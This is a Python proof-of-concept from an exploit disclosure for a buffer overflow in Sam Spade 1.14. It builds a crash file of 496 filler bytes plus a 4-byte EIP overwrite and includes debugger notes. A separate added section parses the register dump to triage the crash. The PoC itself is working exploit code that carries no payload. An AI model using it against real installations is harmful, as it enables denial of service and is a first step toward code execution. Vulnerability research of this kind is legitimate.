#!/usr/bin/env python
# Exploit Title : Sam Spade 1.14 Browse URL Buffer Overflow PoC
# Discovery by: Nipun Jaswal
# Email : mail@nipunjaswal.info
# Discovery Date: 14/11/2015
# Vendor Homepage : http://samspade.org
# Software Link : http://www.majorgeeks.com/files/details/sam_spade.html
# Tested Version: 1.14
# Vulnerability Type: Denial of Service / Proof Of Concept/ Eip Overwrite
# Tested on OS: Windows 7 Home Basic
# Crash Point : Go to Tools > Browse Web> Enter the contents of 'sam_spade_browse_url.txt' > OK , Note: Do
# Not Remove the http://
##########################################################################################
#-----------------------------------NOTES----------------------------------------------#
##########################################################################################

# And the Stack
#0012F73C 41414141 AAAA
#0012F740 41414141 AAAA
#0012F744 DEADBEAF ¯¾Þ

# Registers
#EAX 00000001
#ECX 00000001
#EDX 00000030
#EBX 00000000
#ESP 0012F74C
#EBP 41414141
#ESI 008DA260
#EDI 0176F4E0
#EIP DEADBEAF

f = open("sam_spade_browse_url.txt", "w")
Junk = "A"* 496
eip_overwrite = "\xaf\xbe\xad\xde"
f.write(Junk+eip_overwrite)
f.close()
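
An added crash-triage example (not part of the original PoC or from its author): it parses the register dump from the notes above and reports which registers hold bytes taken from the input, which is what separates a plain denial of service from an EIP overwrite. The function names are assumptions made for this example; the dump and input values are the ones on this page.

```python
import re

# Register dump copied from the PoC's notes (comment markers removed).
DUMP = """\
EAX 00000001
ECX 00000001
EDX 00000030
EBX 00000000
ESP 0012F74C
EBP 41414141
ESI 008DA260
EDI 0176F4E0
EIP DEADBEAF
"""

# The same input the PoC writes: 496 filler bytes, then the 4-byte marker.
POC_INPUT = b"A" * 496 + b"\xaf\xbe\xad\xde"


def parse_registers(dump):
    """Return {name: value} for every 'REG HEXVALUE' line of a debugger dump."""
    pattern = r"^\s*#?\s*(E[A-Z]{2})\s+([0-9A-Fa-f]{8})\s*$"
    return {name: int(value, 16) for name, value in re.findall(pattern, dump, re.M)}


def input_controlled(regs, data):
    """Names of registers whose little-endian bytes occur in the input.

    A match is evidence, not proof: a value such as 00000000 can occur in
    an input by coincidence, so distinctive marker bytes make triage reliable.
    """
    return sorted(name for name, value in regs.items()
                  if value.to_bytes(4, "little") in data)


def triage(dump, data):
    """Classify the crash by what the input reached; returns (verdict, registers)."""
    hits = input_controlled(parse_registers(dump), data)
    if "EIP" in hits:
        return "control-flow hijack: EIP taken from input", hits
    if hits:
        return "memory corruption: input reached " + ", ".join(hits), hits
    return "crash with no input-derived register", hits


if __name__ == "__main__":
    print(triage(DUMP, POC_INPUT))
```
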